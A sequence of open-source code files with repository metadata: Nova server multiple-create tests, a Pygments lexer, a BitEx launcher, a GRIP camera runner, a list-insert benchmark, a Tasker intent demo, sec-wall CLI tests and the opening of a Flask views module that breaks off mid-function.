image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
res = self.controller.create(self.req, body=body).obj
self.assertEqual(FAKE_UUID, res["server"]["id"])
self._check_admin_password_missing(res["server"])
def _check_admin_password_len(self, server_dict):
"""utility function - check server_dict for admin_password length."""
self.assertEqual(CONF.password_length,
len(server_dict["adminPass"]))
def _check_admin_password_missing(self, server_dict):
"""utility function - check server_dict for admin_password absence."""
self.assertNotIn("admin_password", server_dict)
def _create_multiple_instances_resv_id_return(self, resv_id_return):
"""Test creating multiple instances with asking for
reservation_id
"""
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
multiple_create_v21.RRID_ATTRIBUTE_NAME: resv_id_return
}
}
res = self.controller.create(self.req, body=body)
reservation_id = res.obj['reservation_id']
self.assertNotEqual(reservation_id, "")
self.assertIsNotNone(reservation_id)
self.assertTrue(len(reservation_id) > 1)
def test_create_multiple_instances_with_resv_id_return(self):
self._create_multiple_instances_resv_id_return(True)
def test_create_multiple_instances_with_string_resv_id_return(self):
self._create_multiple_instances_resv_id_return("True")
def test_create_multiple_instances_with_multiple_volume_bdm(self):
"""Test that a BadRequest is raised if multiple instances
are requested with a list of block device mappings for volumes.
"""
min_count = 2
bdm = [{'source_type': 'volume', 'uuid': 'vol-xxxx'},
{'source_type': 'volume', 'uuid': 'vol-yyyy'}
]
params = {
block_device_mapping_v21.ATTRIBUTE_NAME: bdm,
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(len(kwargs['block_device_mapping']), 2)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
exc = self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params, no_image=True)
self.assertEqual("Cannot attach one or more volumes to multiple "
"instances", exc.explanation)
def test_create_multiple_instances_with_single_volume_bdm(self):
"""Test that a BadRequest is raised if multiple instances
are requested to boot from a single volume.
"""
min_count = 2
bdm = [{'source_type': 'volume', 'uuid': 'vol-xxxx'}]
params = {
block_device_mapping_v21.ATTRIBUTE_NAME: bdm,
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(kwargs['block_device_mapping'][0]['volume_id'],
'vol-xxxx')
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
exc = self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params, no_image=True)
self.assertEqual("Cannot attach one or more volumes to multiple "
"instances", exc.explanation)
def test_create_multiple_instance_with_non_integer_max_count(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: 2.5,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
self.assertRaises(self.validation_error,
self.controller.create, self.req, body=body)
def test_create_multiple_instance_with_non_integer_min_count(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2.5,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
self.assertRaises(self.validation_error,
self.controller.create, self.req, body=body)
class MultiCreateExtensionTestV2(MultiCreateExtensionTestV21):
validation_error = webob.exc.HTTPBadRequest
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(MultiCreateExtensionTestV2, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
fakes.stub_out_nw_api(self.stubs)
self.ext_mgr = extensions_v20.ExtensionManager()
self.ext_mgr.extensions = {
'os-volumes': 'fake',
'os-multiple-create': 'fake',
'os-block-device-mapping-v2-boot': 'fake'
}
self.controller = servers_v20.Controller(self.ext_mgr)
no_mult_ext_mgr = extensions_v20.ExtensionManager()
no_mult_ext_mgr.extensions = {
'os-volumes': 'fake',
'os-block-device-mapping-v2-boot': 'fake'
}
self.no_mult_create_controller = servers_v20.Controller(
no_mult_ext_mgr)
def instance_create(context, inst):
inst_type = flavors.get_flavor_by_flavor_id(3)
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
def_image_ref = 'http://localhost/images/%s' % image_uuid
self.instance_cache_num += 1
instance = fake_instance.fake_db_instance(**{
'id': self.instance_cache_num,
'display_name': inst['display_name'] or 'test',
'uuid': FAKE_UUID,
'instance_type': inst_type,
'access_ip_v4': '1.2.3.4',
'access_ip_v6': 'fead::1234',
'image_ref': inst.get('image_ref', def_image_ref),
'user_id': 'fake',
'project_id': 'fake',
'reservation_id': inst['reservation_id'],
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"config_drive": None,
"progress": 0,
"fixed_ips": [],
"task_state": "",
"vm_state": "",
"root_device_name": inst.get('root_device_name', 'vda'),
"security_groups": inst['security_groups'],
})
self.instance_cache_by_id[instance['id']] = instance
self.instance_cache_by_uuid[instance['uuid']] = instance
return instance
def instance_get(context, instance_id):
"""Stub for compute/api create() pulling in instance after
scheduling
"""
return self.instance_cache_by_id[instance_id]
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
self.stubs.Set(uuid, 'uuid4', fake_gen_uuid)
self.stubs.Set(db, 'instance_create', instance_create)
self.stubs.Set(db, 'instance_get', instance_get)
def _check_multiple_create_extension_disabled(self, **kwargs):
self.assertEqual(kwargs['min_count'], 1)
self.assertEqual(kwargs['max_count'], 1)
|
jeffrey4l/nova
|
nova/tests/unit/api/openstack/compute/contrib/test_multiple_create.py
|
Python
|
apache-2.0
| 22,764
|
from pygments.lexer import RegexLexer, words
from pygments.token import *
KEYWORDS = [
'store', 'link', 'view', 'style',
'import', 'from',
'for', 'of', 'key',
'if', 'elif', 'else',
]
class KhufuLexer(RegexLexer):
name = 'Khufu'
aliases = ['khufu']
filenames = ['*.khufu']
tokens = {
'root': [
(words(KEYWORDS, suffix=r'\b'), Keyword),
(r'//.*\n', Comment),
(r'"[^"]*"', String),
(r'@[a-zA-Z_0-9]+', Name.Builtin),
(r'<[a-zA-Z_0-9]+', Name.Tag, 'tag'),
(r'.', Text),
],
'tag': [
(r'@[a-zA-Z_0-9]+', Name.Builtin),
(r'>', Name.Tag, '#pop'),
(r'.', Text),
],
}
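# Usage sketch (not part of the original file; the sample source is made up):
# the lexer drops into the standard pygments pipeline like any RegexLexer.
#
#   from pygments import highlight
#   from pygments.formatters import HtmlFormatter
#   print(highlight('store @x = 1', KhufuLexer(), HtmlFormatter()))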
|
tailhook/khufu
|
doc/khufulexer.py
|
Python
|
apache-2.0
| 738
|
#!/usr/bin/env python
import sys
import os
import ConfigParser
import json
import multiprocessing
from functools import partial
import time
import logging
import argparse
from appdirs import site_config_dir
from Queue import Queue
from threading import Thread
ROOT_PATH = os.path.abspath( os.path.join(os.path.dirname(__file__), "../"))
sys.path.insert( 0, os.path.join(ROOT_PATH, 'libs'))
sys.path.insert( 0, os.path.join(ROOT_PATH, 'apps'))
from pyblinktrade.project_options import ProjectOptions
def trade_instance(instance_name, project_options):
from trade.trade_application import TradeApplication
app = TradeApplication.instance()
app.initialize(project_options, instance_name)
app.run()
def ws_gateway_instance( instance_name , project_options):
from ws_gateway.main import run_application
run_application(project_options, instance_name)
def mailer_instance( instance_name , project_options):
from mailer.main import run_application
run_application(project_options,instance_name)
def main():
parser = argparse.ArgumentParser(description="Blinktrade")
parser.add_argument('-c',
"--config",
action="store",
dest="config",
help='Configuration file', type=str)
arguments = parser.parse_args()
candidates = [ os.path.join(site_config_dir('blinktrade'), 'bitex.ini'),
os.path.expanduser('~/.blinktrade/bitex.ini'),
arguments.config]
config = ConfigParser.SafeConfigParser()
config.read( candidates )
processes = []
for section_name in config.sections():
project_options = ProjectOptions(config, section_name)
if section_name[:5] == 'trade':
p = multiprocessing.Process(name=section_name, target=partial(trade_instance,section_name, project_options ) )
elif section_name[:10] == 'ws_gateway':
p = multiprocessing.Process(name=section_name, target=partial(ws_gateway_instance,section_name, project_options ) )
elif section_name[:6] == 'mailer':
p = multiprocessing.Process(name=section_name, target=partial(mailer_instance,section_name, project_options ) )
else:
raise RuntimeError("Invalid section name")
processes.append(p)
# start all sub processes
for p in processes:
p.daemon = True
p.start()
# wait for them to finish
for p in processes:
logging.debug('waiting %s', p.name )
p.join()
if __name__ == '__main__':
main()
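# Illustrative bitex.ini layout (section and option names are hypothetical;
# only the prefixes matter, since main() dispatches on section_name[:5],
# [:10] and [:6]):
#
#   [trade_main]
#   ; options read through ProjectOptions
#
#   [ws_gateway_main]
#   ; ...
#
#   [mailer_main]
#   ; ...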
|
coinjet/bitex
|
apps/main.py
|
Python
|
gpl-3.0
| 2,479
|
import inspect
from .cameraserver import CameraServer
def run(grip_pipeline):
'''
A function that can be used to run python image processing code
as generated by GRIP
'''
if inspect.isclass(grip_pipeline):
grip_pipeline = grip_pipeline()
cs = CameraServer.getInstance()
cs.enableLogging()
cs.startAutomaticCapture()
cvSink = cs.getVideo()
outputStream = None
img = None
while True:
time, img = cvSink.grabFrame(img)
if time == 0:
if outputStream:
outputStream.notifyError(cvSink.getError())
continue
# Process it with GRIP
out_img = grip_pipeline.process(img)
if out_img is not None:
try:
outputStream.putFrame(out_img)
except AttributeError:
if outputStream is None:
outputStream = cs.putVideo('GRIP', img.shape[1], img.shape[0])
else:
raise
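# Usage sketch (illustrative; the module and class below are hypothetical
# stand-ins for whatever GRIP generated): any object or class exposing a
# process(img) method that returns the processed frame will work.
#
#   from my_grip_pipeline import GripPipeline
#   run(GripPipeline)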
|
Ironpulse/CRC2017
|
Cam/grip.py
|
Python
|
agpl-3.0
| 1,049
|
#!/usr/bin/python
from time import time
REPS = 17500
def insert():
m = [None]
i = 0
now = time()
while i < REPS:
m.insert(0, i)
i += 1
print 'Elapsed (insert):', time() - now
def colonZero():
m = [None]
i = 0
now = time()
while i < REPS:
m[:0] = [i]
i += 1
print 'Elapsed (colon-0):', time() - now
def main():
insert()
colonZero()
if __name__ == '__main__':
main()
raw_input()
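# Note: both variants prepend to a list, which shifts every existing element,
# so each iteration costs O(n) and the whole loop O(n**2). If prepending
# dominates, collections.deque.appendleft() does it in O(1) per element.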
|
opensvn/test
|
src/study/python/cpp/ch06/alt/insertVsColonZero.py
|
Python
|
gpl-2.0
| 442
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2010 Dariusz Suchojad <dsuch at gefira.pl>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
import glob, imp, itertools, os, tempfile, shutil, subprocess, unittest, uuid
# nose
from nose.tools import assert_raises, assert_true, eq_
# textfixtures
from testfixtures import Replacer
# mock
from mock import Mock, mocksignature, patch
# Spring Python
from springpython.context import ApplicationContext
# sec-wall
from secwall import app_context, cli, server
class _BaseTestCase(unittest.TestCase):
""" A base class for all CLI-related test cases.
"""
temp_dir_prefix = 'tmp-sec-wall-'
def tearDown(self):
temp_dir = tempfile.gettempdir()
pattern = os.path.join(temp_dir, self.temp_dir_prefix) + '*'
temp_dirs = glob.glob(pattern)
for temp_dir in temp_dirs:
shutil.rmtree(temp_dir)
class CommandTestCase(_BaseTestCase):
""" Tests for the secwall.cli._Command class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix=self.temp_dir_prefix)
open(os.path.join(self.test_dir, '.sec-wall-config'), 'w')
open(os.path.join(self.test_dir, 'config.py'), 'w')
open(os.path.join(self.test_dir, 'zdaemon.conf'), 'w')
def test_defaults(self):
""" Tests the correct values of the default class-level objects.
"""
eq_(cli._Command.needs_config_mod, True)
eq_(cli._Command._config_marker, '.sec-wall-config')
def test_command_init(self):
""" Tests the cli._Command.__init__ method.
"""
try:
cli._Command(uuid.uuid4().hex, self.app_ctx, False)
except SystemExit, e:
eq_(e.code, 3)
else:
raise Exception('Expected a SystemExit here')
def test_command_not_stop(self):
""" Tests whether executing a command other that 'stop' returns the
process' PID.
"""
expected_pid = uuid.uuid4().int
with patch.object(cli._Command, '_execute_zdaemon_command') as mock_method:
# Any command other than 'stop'. Should simply return the pid
# of the subprocess.
command_name = uuid.uuid4().hex
mock_method.return_value = expected_pid
command = cli._Command(self.test_dir, self.app_ctx, False)
given_pid = command._zdaemon_command(command_name, 'foo.conf')
eq_(given_pid, expected_pid)
eq_(mock_method.called, True)
mock_method.assert_called_with(
[u'zdaemon', u'-C', os.path.join(self.test_dir, 'foo.conf'), command_name])
def test_command_stop(self):
""" Tests whether executing a 'stop' command deletes a temporary zdaemon's
config file.
"""
expected_pid = uuid.uuid4().int
with patch.object(cli._Command, '_execute_zdaemon_command') as mock_method:
# The 'stop' command. Not only does it communicate with
            # the subprocesses but also deletes the zdaemon's config file
# created in the self.setUp method.
command = cli._Command(self.test_dir, self.app_ctx, False)
command._zdaemon_command('stop', 'zdaemon.conf')
exists = os.path.exists(os.path.join(self.test_dir, 'zdaemon.conf'))
eq_(exists, False)
def test_wait_none(self):
""" Tests whether an Exception is being raised when the return value
of the .wait call is None.
"""
# The return code of the 'wait' call on a Popen object returned None.
# Doesn't even matter that there were too few arguments in the call
# to 'zdaemon' command as we hadn't even got as far as to actually call
# it.
with Replacer() as r:
def _wait(self):
self.returncode = None
r.replace('subprocess.Popen.wait', _wait)
try:
command = cli._Command(self.test_dir, self.app_ctx, False)
command._execute_zdaemon_command(['zdaemon'])
except Exception, e:
eq_(e.args[0], 'Could not execute command [u\'zdaemon\'] (p.returncode is None)')
else:
raise Exception('An exception was expected here.')
def test_too_few_arguments(self):
""" Tests the expected exception and the return code when there are
too few arguments passed in to 'zdaemon' command.
"""
# Too few arguments to the 'zdaemon' command.
with Replacer() as r:
stdout = uuid.uuid4().hex
stderr = uuid.uuid4().hex
def _communicate(self):
return [stdout, stderr]
r.replace('subprocess.Popen.communicate', _communicate)
try:
command = cli._Command(self.test_dir, self.app_ctx, False)
command._execute_zdaemon_command(['zdaemon'])
except Exception, e:
msg = e.args[0]
expected_start = 'Failed to execute command [u\'zdaemon\']. return code=['
expected_end = '], stdout=[{0}], stderr=[{1}]'.format(stdout, stderr)
assert_true(msg.startswith(expected_start))
assert_true(msg.endswith(expected_end))
return_code = msg[len(expected_start):-len(expected_end)]
# We caught an error so the return_code must be a positive integer.
return_code = int(return_code)
assert_true(return_code > 0)
else:
raise Exception('An exception was expected here.')
def test_pid_returning(self):
""" Tests whether the correct PID is being returned by the
'_execute_zdaemon_command' method.
"""
with Replacer() as r:
expected_pid = 4893
stdout = 'program running; pid={0}'.format(expected_pid)
stderr = uuid.uuid4().hex
def _communicate(self):
return [stdout, stderr]
def _Popen(self, *ignored_args, **ignored_kwargs):
class _DummyPopen(object):
def __init__(self, *ignored_args, **ignored_kwargs):
self.returncode = 0
def communicate(self):
return stdout, stderr
def wait(self):
pass
return _DummyPopen()
r.replace('subprocess.Popen', _Popen)
command = cli._Command(self.test_dir, self.app_ctx, False)
given_pid = int(command._execute_zdaemon_command(['zdaemon']))
# PIDs must be the same.
eq_(given_pid, expected_pid)
def test_enrichment(self):
""" Tests whether enrichment of the config module works fine.
"""
command = cli._Command(self.test_dir, self.app_ctx, False)
config_mod = command._get_config_mod()
elems = [elem for elem in dir(config_mod) if not elem.startswith('__')]
eq_(len(elems), 27)
names = ('server_type', 'host', 'port', 'log', 'crypto_dir', 'keyfile',
'certfile', 'ca_certs', 'not_authorized', 'forbidden',
'no_url_match', 'internal_server_error', 'validation_precedence',
'client_cert_401_www_auth', 'syslog_facility', 'syslog_address', 'log_level', 'log_file_config',
'server_tag', 'instance_name', 'quote_path_info', 'quote_query_string',
'from_backend_ignore', 'add_invocation_id', 'sign_invocation_id',
'default_url_config', 'add_default_if_not_found')
for name in names:
assert_true(name in elems, (name,))
def test_run_not_implemented_error(self):
""" Tests whether the default implementation of the .run method raises
a NotImplementedError.
"""
# The 'run' method must be implemented by subclasses.
command = cli._Command(self.test_dir, self.app_ctx, False)
assert_raises(NotImplementedError, command.run)
def test_config_mod_missing(self):
""" A SystemExit should be raised when the config directory doesn't
contain a config marker file.
"""
command = cli._Command(self.test_dir, self.app_ctx, False)
command.config_dir = tempfile.mkdtemp(prefix=self.temp_dir_prefix)
try:
command._get_config_mod()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
class InitTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Init class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
def test_defaults(self):
""" Tests the class-level defaults.
"""
eq_(cli.Init.needs_config_mod, False)
def test_run_dir_non_empty(self):
""" Running the command in a non-empty dir should result in an
exception being raised.
"""
open(os.path.join(self.test_dir, uuid.uuid4().hex), 'w').close()
init = cli.Init(self.test_dir, self.app_ctx, False)
try:
init.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
def test_run_dir_empty(self):
""" Simulates the actual user's executing the command in an empty
directory and tests whether the files created by the command are fine.
"""
init = cli.Init(self.test_dir, self.app_ctx, False)
init.run()
f, p, d = imp.find_module('config', [self.test_dir])
config_mod = imp.load_module('config', f, p, d)
instance_secret = getattr(config_mod, 'INSTANCE_SECRET')
cur_dir = getattr(config_mod, 'cur_dir')
keyfile = getattr(config_mod, 'keyfile')
certfile = getattr(config_mod, 'certfile')
ca_certs = getattr(config_mod, 'ca_certs')
default_handler = getattr(config_mod, 'default')
urls = getattr(config_mod, 'urls')
# Instance secret is a UUID4 by default
eq_(len(instance_secret), 32)
eq_(uuid.UUID(instance_secret, version=4).hex, instance_secret)
eq_(cur_dir, self.test_dir)
eq_(os.path.normpath(keyfile), os.path.join(self.test_dir, 'crypto', 'server-priv.pem'))
eq_(os.path.normpath(certfile), os.path.join(self.test_dir, 'crypto', 'server-cert.pem'))
eq_(os.path.normpath(ca_certs), os.path.join(self.test_dir, 'crypto', 'ca-cert.pem'))
default_config = default_handler()
eq_(len(default_config), 4)
eq_(default_config['ssl'], True)
eq_(default_config['ssl-cert'], True)
eq_(default_config['ssl-cert-commonName'], instance_secret)
eq_(default_config['host'], 'http://' + instance_secret)
eq_(urls, [('/*', default_config),])
class StartTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Start class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
cli.Init(self.test_dir, self.app_ctx, False).run()
def test_run_invalid_server_type(self):
""" The config's server type is of invalid type (should be either 'http'
or 'https').
"""
start = cli.Start(self.test_dir, self.app_ctx, False)
setattr(start.config_mod, 'server_type', uuid.uuid4().hex)
try:
start.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
def test_missing_https_options(self):
""" Several crypto-related files must always be present if the config's
server_type is 'https'.
"""
os.mkdir(os.path.join(self.test_dir, 'crypto'))
valid_combinations = [
os.path.join(self.test_dir, 'crypto', 'server-priv.pem'),
os.path.join(self.test_dir, 'crypto', 'server-cert.pem'),
os.path.join(self.test_dir, 'crypto', 'ca-cert.pem')
]
for invalid_dimension in range(len(valid_combinations)):
invalid_combinations = list(itertools.combinations(valid_combinations, invalid_dimension))
for invalid_combination in invalid_combinations:
for file_name in invalid_combination:
open(file_name, 'w')
start = cli.Start(self.test_dir, self.app_ctx, False)
setattr(start.config_mod, 'server_type', 'https')
try:
start.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
shutil.rmtree(os.path.join(self.test_dir, 'crypto'))
os.mkdir(os.path.join(self.test_dir, 'crypto'))
else:
msg = 'Expected a SystemExit here, invalid_combination=[{0}]'
msg = msg.format(invalid_combination)
raise Exception(msg)
def test_run_ok(self):
""" Tests whether starting a server off a valid config file works fine.
"""
test_dir = self.test_dir
with Replacer() as r:
def _zdaemon_command(self, zdaemon_command, conf_file):
eq_(zdaemon_command, 'start')
eq_(conf_file, os.path.join(test_dir, 'zdaemon.conf'))
r.replace('secwall.cli.Start._zdaemon_command', _zdaemon_command)
start = cli.Start(self.test_dir, self.app_ctx, False)
setattr(start.config_mod, 'server_type', 'http')
start.run()
crypto_files = [
os.path.join(self.test_dir, 'crypto', 'server-priv.pem'),
os.path.join(self.test_dir, 'crypto', 'server-cert.pem'),
os.path.join(self.test_dir, 'crypto', 'ca-cert.pem')
]
os.mkdir(os.path.join(self.test_dir, 'crypto'))
for name in crypto_files:
open(name, 'w').close()
setattr(start.config_mod, 'server_type', 'https')
start.run()
def test_prepare_config(self):
crypto_files = [
os.path.join(self.test_dir, 'crypto', 'server-priv.pem'),
os.path.join(self.test_dir, 'crypto', 'server-cert.pem'),
os.path.join(self.test_dir, 'crypto', 'ca-cert.pem')
]
os.mkdir(os.path.join(self.test_dir, 'crypto'))
for name in crypto_files:
open(name, 'w').close()
cli.prepare_config(self.test_dir, 1)
zdaemon_conf_loc = os.path.join(self.test_dir, 'zdaemon.conf')
eq_(True, os.path.exists(zdaemon_conf_loc))
class ForkTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Fork class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
cli.Init(self.test_dir, self.app_ctx, False).run()
log_config = """
[loggers]
keys=root
[handlers]
keys=consoleHandler
[formatters]
keys=simpleFormatter
[logger_root]
level=DEBUG
handlers=consoleHandler
[handler_consoleHandler]
class=StreamHandler
level=DEBUG
formatter=simpleFormatter
args=(sys.stdout,)
"""
self.log_file_config = os.path.join(self.test_dir, uuid.uuid4().hex)
open(self.log_file_config, 'w').write(log_config)
def test_run(self):
""" Tests whether running the command works fine.
"""
with patch.object(server.HTTPProxy, 'serve_forever') as mock_method:
fork = cli.Fork(self.test_dir, self.app_ctx, False)
fork.run()
with patch.object(server.HTTPSProxy, 'serve_forever') as mock_method:
fork = cli.Fork(self.test_dir, self.app_ctx, True)
fork.run()
def test_logging(self):
""" Depending on what the configuration says, logging should be using
either syslog or a custom configuration file into which anything may go.
"""
with Replacer() as r:
def _file_config(*args, **kwargs):
eq_(args[0], self.log_file_config)
r.replace('logging.config.fileConfig', _file_config)
fork = cli.Fork(self.test_dir, self.app_ctx, False)
fork.config_mod.log_file_config = self.log_file_config
with patch.object(server.HTTPProxy, 'serve_forever') as mock_method:
fork.run()
# Clean up after the test, otherwise unrelated tests will see the
# changes made to the config module.
fork.config_mod.log_file_config = None
class StopTestCase(_BaseTestCase):
""" Tests for the secwall.cli.Stop class.
"""
def setUp(self):
self.app_ctx = ApplicationContext(app_context.SecWallContext())
self.test_dir = tempfile.mkdtemp(prefix='tmp-sec-wall-')
def test_run_ok(self):
""" Tests whether running the command with all files in their expected
locations.
"""
test_dir = self.test_dir
open(os.path.join(self.test_dir, 'zdaemon.conf'), 'w')
with Replacer() as r:
def _zdaemon_command(self, zdaemon_command, conf_file):
eq_(zdaemon_command, 'stop')
eq_(conf_file, os.path.join(test_dir, 'zdaemon.conf'))
r.replace('secwall.cli.Stop._zdaemon_command', _zdaemon_command)
stop = cli.Stop(self.test_dir, self.app_ctx, False)
stop.run()
def test_run_zdaemon_conf_missing(self):
""" Running the command with the 'zdaemon.conf' file missing should
result in a SystemExit being raised.
"""
stop = cli.Stop(self.test_dir, self.app_ctx, False)
try:
stop.run()
except SystemExit, e:
return_code = e.args[0]
eq_(int(return_code), 3)
else:
raise Exception('Expected a SystemExit here')
|
dsuch/sec-wall
|
code/tests/test_cli.py
|
Python
|
gpl-3.0
| 18,478
|
import bnbcalendar
from pprint import pprint
def calculate_total_revenue(calendar):
total = 0
for day, details in calendar.items():
if details["available"] is False:
total += details["price"]
return total
def calculate_revenue_for_listing(listing_id, start=None, end=None, adults=None):
if start is None or end is None:
calendar = bnbcalendar.get_calendar_for_next_year(property_id=listing_id)
else:
calendar = bnbcalendar.get_calendar_for_dates(property_id=listing_id,
start=start,
end=end)
total = calculate_total_revenue(calendar)
return total
if __name__ == "__main__":
#total = calculate_revenue_for_listing("4914702")
total = calculate_revenue_for_listing("16042826")
print(total)
|
mpresh/airbnb-tools
|
airbnb/system/finance.py
|
Python
|
mit
| 878
|
__author__ = "Brian Lenihan <brian.lenihan@gmail.com"
__copyright__ = "Copyright (c) 2012 Python for Android Project"
__license__ = "Apache License, Version 2.0"
import os
import logging
import androidhelper
"""
Create and set a new Tasker variable, display the variable's value in a Tasker
popup, and then clear the variable.
Misc / Allow External Access must be set in Tasker's prefs.
Tasker action code reference:
http://tasker.dinglisch.net/ActionCodes.java
"""
SET_VARIABLE = 547
CLEAR_VARIABLE = 549
POPUP = 550
logging.basicConfig(level=logging.INFO)
class Tasker(object):
def __init__(self):
self.droid = androidhelper.Android()
self.extras = dict(
version_number = '1.0',
task_name = 'tasker_demo.{}'.format(os.getpid()),
task_priority = 9)
self.actions = 0
def bundle(self, action, *args):
# Unused parameters are padded with False
args = list(args)
args.extend([False]*(6-len(args)))
self.actions += 1
self.extras.update(
{'action{}'.format(self.actions) : dict(
{'action' : action,
'arg:1' : args[0],
'arg:2' : args[1],
'arg:3' : args[2],
'arg:4' : args[3],
'arg:5' : args[4],
'arg:6' : args[5]})
})
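    # Sketch of what a single bundle() call adds to self.extras (values are
    # illustrative): bundle(SET_VARIABLE, "%PY4A_DEMO", "Hello") yields
    #   'action1': {'action': 547, 'arg:1': '%PY4A_DEMO', 'arg:2': 'Hello',
    #               'arg:3': False, 'arg:4': False, 'arg:5': False,
    #               'arg:6': False}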
def broadcast_intent(self):
intent = self.droid.makeIntent(
            'net.dinglisch.android.tasker.ACTION_TASK', None, None, self.extras).result
logging.debug("-- {}".format(intent))
self.droid.sendBroadcastIntent(intent)
if __name__ == "__main__":
tasker = Tasker()
tasker.bundle(SET_VARIABLE, "%PY4A_DEMO", "Hello from python")
# Popup: String title, String text, String background image, Scene layout,
# Integer timeout, Boolean show over keyguard, Boolean condition
tasker.bundle(POPUP, "Tasker", "%PY4A_DEMO", "", "Popup", 5, True, False)
tasker.bundle(CLEAR_VARIABLE, "%PY4A_DEMO")
tasker.broadcast_intent()
|
gc313/Learning-Python
|
tasker_example.py
|
Python
|
lgpl-3.0
| 1,901
|
from neuroelectro import models as m
__author__ = 'stripathy'
def get_article_last_author(article):
"""
Gets the last author object from NeuroElectro DB given an article
"""
return get_article_author(article, author_position = -1)
def get_article_author(article, author_position = -1):
"""
    Gets the author object from NeuroElectro DB given an article and requested author_position (0-indexed)
"""
author_list_str = article.author_list_str
if author_list_str is None:
return None
author_list = author_list_str.split(';')
last_author_str = author_list[author_position]
last_author_split_str = last_author_str.split()
last_author_last_name = last_author_split_str[:-1]
last_author_last_name = ' '.join(last_author_last_name)
try:
if len(last_author_split_str) > 1:
last_author_initials = last_author_split_str[-1]
author_ob = m.Author.objects.filter(last = last_author_last_name,
initials = last_author_initials,
article = article)[0]
else:
last_author_initials = None
author_ob = m.Author.objects.filter(last = last_author_last_name,
article = article)[0]
return author_ob
except IndexError:
#print 'Cant find author %s' % last_author_str
#cant_find_count += 1
#last_author_node_list.append(None)
return None
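# Worked example (hypothetical data): with author_list_str "Smith J; Doe JA"
# and author_position=-1, the code selects "Doe JA", giving last name "Doe"
# and initials "JA" for the Author lookup.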
|
neuroelectro/neuroelectro_org
|
db_functions/author_search.py
|
Python
|
gpl-2.0
| 1,532
|
# -*- coding: utf-8 -*-
"""
Defines views.
"""
import locale
from calendar import day_abbr, month_name
from collections import OrderedDict
from flask import abort, make_response, redirect
from flask_mako import render_template
from mako.exceptions import TopLevelLookupException
from main import app
from utils import (
get_data,
get_dates,
get_server_config,
group_by_weekday,
jsonify,
mean,
total_hours,
work_hours
)
import logging
log = logging.getLogger(__name__) # pylint: disable=invalid-name
TEMPLATES = [
('presence_weekday.html', 'Presence weekday'),
('mean_time_weekday.html', 'Mean time weekday'),
('presence_start_end.html', 'Presence start-end'),
('presence_top_5.html', 'Top 5')
]
locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF-8')
@app.route('/', methods=['GET'])
def mainpage():
"""
Redirects to front page.
"""
return redirect('presence_weekday.html')
@app.route('/<string:template>', methods=['GET'])
def serve_template(template):
"""
Serves appropriate template by param.
"""
try:
return render_template(template, templates=TEMPLATES, current=template)
except TopLevelLookupException:
        return make_response('page not found', 404)
@app.route('/api/v1/photo_url/<int:user_id>', methods=['GET'])
@jsonify
def prepare_photo_url(user_id):
"""
Returns url for intranet api in order to get photo of given user.
"""
conf = get_server_config()
return '{}://{}/api/images/users/{}'.format(
conf['protocol'],
conf['host'],
user_id
)
@app.route('/api/v1/users', methods=['GET'])
@jsonify
def users_view():
